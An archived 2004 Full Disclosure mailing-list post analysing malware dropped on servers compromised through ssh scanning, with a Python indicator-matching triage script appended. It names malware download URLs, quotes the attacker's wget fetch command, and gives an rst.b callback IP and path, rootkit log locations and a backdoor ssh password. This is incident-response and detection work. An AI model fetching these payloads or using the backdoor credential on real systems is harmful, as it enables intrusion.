Full Disclosure mailing list archives
Re: Automated ssh scanning
From: "VeNoMouS" <venom () gen-x co nz>
Date: Fri, 27 Aug 2004 13:40:01 +1200
lol the amount of people still trying to work out what these binaries are is amusing, I already broke down what each package was and mailed it to full disclosure over 24hrs ago, don't you people read threads?

I'll post it again.....

www.bo2k-rulez.net/a
kernel do_brk exploit by isec - http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php, infected with rst.b, which when run tries to connect to 207.66.155.21 on port 80 requesting /~telecom69/gov.php which is offline.

www.corbeanu.as.ro/t.gz
Ptrace/kmod kernel exploit by isec - http://www.k-otik.com/exploits/03.30.kernel.c.php

http://roarmy.com/god.tgz
root kit with backdoored ssh listens on port 26000 which replaces smbd binary, logging of the ssh connections goes to /usr/include/iceconf.h, also has a crappy tcp sniffer which logs to /usr/lib/libice.log, and a syn flooder ***** backdoor password for this ssh door is ice4budu

www.generatiapro.go.ro/fast.tgz
emech setup for undernet to join #tty.

----- Original Message -----
From: "Ron DuFresne" <dufresne () winternet com>
To: "Gary E. Miller" <gem () rellim com>
Cc: "Deigo Dude" <deigodude () aol com>; <full-disclosure () lists netsys com>
Sent: Friday, August 27, 2004 11:59 AM
Subject: Re: [Full-disclosure] Automated ssh scanning
Howdy Gary,

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> Yo All!
>
> On Thu, 26 Aug 2004, Deigo Dude wrote:
>
> > Maybe running this test again, and this time ...
>
> No need to run the test again.
>
> From the .history I duplicated this:
>
>     wget www.bo2k-rulez.net/a
>
> Then did this to see the strings in the binary:
>
>     strings a | less
>
> This string looked interesting:
>
>     Kernel seems not to be vulnerable
>
> A google on that string yields the exploit:
>
>     http://www.k-otik.com/exploits/12.05.hatorihanzo.c.php
>
> A simple exploit for the well known do_brk bug in the Linux kernel...

Cool, I was incorrect in assuming this was a fully patched system and the compromise likely being an application sploit it appears.

Thanks,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***

OK, so you're a Ph.D. Just don't touch anything.
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
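The triage Gary describes (pull the dropped binary, run `strings` over it, search for a telling message) is easy to script so the next box that turns up the same toolkit gets classified without a manual read. The example below is added here and is not code from anyone in this thread; it reimplements the printable-run scan that `strings` does and matches the result against indicators taken from the posts above (the do_brk exploit's "Kernel seems not to be vulnerable" message, the rst.b callback host and path, and the god.tgz log paths and backdoor password). The family labels, the `SAMPLE_BINARY` bytes and the function names are all constructed for illustration; the sample is not the real `a` binary.

```python
"""String-based triage of a dropped binary, in the spirit of `strings a | less`."""
import re
from typing import Dict, List

# Indicator strings lifted from this thread. The family names are my own labels.
INDICATORS: Dict[str, List[bytes]] = {
    "do_brk exploit (hatorihanzo.c)": [b"Kernel seems not to be vulnerable"],
    "rst.b infection (callback)": [b"207.66.155.21", b"/~telecom69/gov.php"],
    "god.tgz ssh backdoor": [
        b"/usr/include/iceconf.h",
        b"/usr/lib/libice.log",
        b"ice4budu",
    ],
}


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Return every run of at least min_len printable ASCII bytes (like GNU strings -n)."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(data)]


def triage(data: bytes, indicators: Dict[str, List[bytes]] = INDICATORS) -> Dict[str, List[str]]:
    """Map each indicator family to the indicator strings present in the binary.

    A family is reported only when at least one of its needles occurs as a
    substring of some extracted string; families with no hits are omitted.
    """
    found = extract_strings(data)
    hits: Dict[str, List[str]] = {}
    for family, needles in indicators.items():
        matched = [n.decode("ascii") for n in needles
                   if any(n.decode("ascii") in s for s in found)]
        if matched:
            hits[family] = matched
    return hits


# Constructed sample input (not a real file): an ELF-looking header, some
# non-printable filler, and a few of the thread's strings embedded the way a
# compiler would leave them in .rodata.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01\x00" + bytes(range(0, 32)) * 2
    + b"Kernel seems not to be vulnerable\x00"
    + b"\x00\x01\x02"
    + b"GET /~telecom69/gov.php HTTP/1.0\x00"
    + b"207.66.155.21\x00"
    + b"\xff\xfe\xfd"
)


if __name__ == "__main__":
    for family, matched in triage(SAMPLE_BINARY).items():
        print(f"{family}: {', '.join(matched)}")
```

Run it against a real sample with `triage(open(path, "rb").read())`. Two caveats: a packed or encrypted dropper will show none of these strings until it is unpacked, so an empty result is not a clean bill of health; and the god.tgz rootkit is better confirmed on the host itself (a listener on port 26000, a modified smbd binary, the log files under /usr/include and /usr/lib that VeNoMouS lists) than by strings alone.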
Current thread:
- Re: Automated ssh scanning, (continued)
- Re: Automated ssh scanning KF_lists (Aug 26)
- Re: Automated ssh scanning Richard Verwayen (Aug 26)
- Re: Automated ssh scanning Valdis . Kletnieks (Aug 26)
- RE: Automated ssh scanning Ron DuFresne (Aug 26)
- Re: Automated ssh scanning Deigo Dude (Aug 26)
- Re: Automated ssh scanning KF_lists (Aug 26)
- RE: Automated ssh scanning Todd Towles (Aug 26)
- Re: Automated ssh scanning Tremaine (Aug 26)
- Re: Automated ssh scanning Deigo Dude (Aug 26)
- Re: Automated ssh scanning Gary E. Miller (Aug 26)
- Re: Automated ssh scanning Ron DuFresne (Aug 26)
- Re: Automated ssh scanning VeNoMouS (Aug 26)
- Re: Automated ssh scanning Tremaine (Aug 27)
- Re: Automated ssh scanning Tremaine (Aug 26)
- Re: Automated ssh scanning Ng Pheng Siong (Aug 26)
- Malware can silently open holes in SP2 Firewall jklemenc (Aug 26)